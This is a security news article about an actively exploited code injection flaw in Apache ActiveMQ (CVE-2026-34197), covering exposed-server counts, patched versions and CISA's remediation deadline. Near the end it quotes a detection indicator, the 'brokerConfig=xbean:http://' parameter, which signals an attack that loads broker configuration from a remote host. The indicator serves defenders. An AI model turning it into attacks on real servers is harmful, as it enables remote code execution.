GoKawiilNonprofit security organization Shadowserver found that over 6,400 Apache ActiveMQ servers exposed online are vulnerable to ongoing attacks exploiting a high-severity code injection vulnerability.
Apache ActiveMQ is the most popular open-source multi-protocol message broker for asynchronous communication between Java applications.
Tracked as CVE-2026-34197, the vulnerability was discovered by Horizon3 researcher Naveen Sunkavally using the Claude AI assistant after remaining undetected for 13 years.
As Sunkavally explained, this security flaw stems from an improper input validation weakness that enables authenticated threat actors to execute arbitrary code on unpatched systems. The Apache maintainers have patched the vulnerability on March 30 in ActiveMQ Classic versions 6.2.3 and 5.19.4.
As threat monitoring service ShadowServer warned on Monday, more than 6,400 IP addresses with Apache ActiveMQ fingerprints exposed online are also vulnerable to CVE-2026-34197 attacks, with most in Asia (2,925), North America (1,409), and Europe (1,334).
Unpatched ActiveMQ servers exposed online (Shadowserver)
βThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) also warned on Thursday that this Apache ActiveMQ vulnerability is now actively exploited in attacks and ordered Federal Civilian Executive Branch (FCEB) agencies to secure their servers by April 30.
"This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise," the cybersecurity agency warned.
"Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."
Horizon3 researchers advised admins to search the ActiveMQ broker logs for signs of exploitation by looking for suspicious broker connections that use the internal transport protocol VM and the brokerConfig=xbean:http:// query parameter.
... continue reading